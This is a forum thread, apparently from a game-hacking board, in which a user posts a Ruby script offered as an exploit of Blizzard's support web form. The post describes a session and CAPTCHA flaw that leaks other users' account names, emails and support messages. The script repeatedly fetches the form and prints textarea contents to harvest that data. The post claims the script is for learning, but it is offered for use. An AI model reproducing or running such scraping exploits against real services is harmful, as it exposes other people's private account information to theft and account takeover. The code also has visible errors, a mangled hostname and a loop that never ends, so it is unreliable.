[Exploit] Steal account names, emails, etc. menu

User Tag List

Results 1 to 1 of 1
  1. #1
    masterkain's Avatar Member
    Reputation
    1
    Join Date
    Apr 2008
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [Exploit] Steal account names, emails, etc.

    First, sorry for posting in the wrong forums, but I cannot post in the right one since I haven't wrote yet 5 posts.

    What follows is a very RAW, basic and stripped down Ruby script that will attempt to exploit the blizzard support page. It's meant for very expert and advanced users, therefore don't ask what's wrong in this script and why it doesn't works.

    It's very dangerous to use this script and I post it here only for learning purposes.

    I don't know if Blizzard right now is hotfixing the issue, but they used CAPTCHA on their support page, making use of sessions. What happens is that when a user enters the wrong CAPTCHA meanwhile we are reloading the page, our web page fields will be filled with their required informations. Thus, account name, email, and even what they are writing to Blizzard.

    Code:
    #!ruby
    
    require 'rubygems'
    require 'hpricot'
    require 'open-uri'
    require 'net/https'
    
    i = 100
    while i > 0
      html = Net::HTTP.new("ww. wow-europe. com", 443)
      html.use_ssl = true
      html.start do |http|
        sleep 2
        req = Net::HTTP::Get.new("/support/ securitywebform/se curitywebform2 .html", {"User-Agent" =>
        "test"})
        response = http.request(req)
        resp = response.body
    
        doc = Hpricot(resp)
        #p doc
        p doc.search("//textarea").inner_html
      end
    end

    [Exploit] Steal account names, emails, etc.

Similar Threads

  1. [Selling] Selling Transfers, Faction change, Account name change etc
    By Lalaluck in forum World of Warcraft Buy Sell Trade
    Replies: 0
    Last Post: 10-22-2012, 10:19 AM
  2. Get account name, email. surname really easy (no password)
    By marcje in forum World of Warcraft General
    Replies: 4
    Last Post: 05-20-2008, 06:14 PM
All times are GMT -5. The time now is 11:04 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search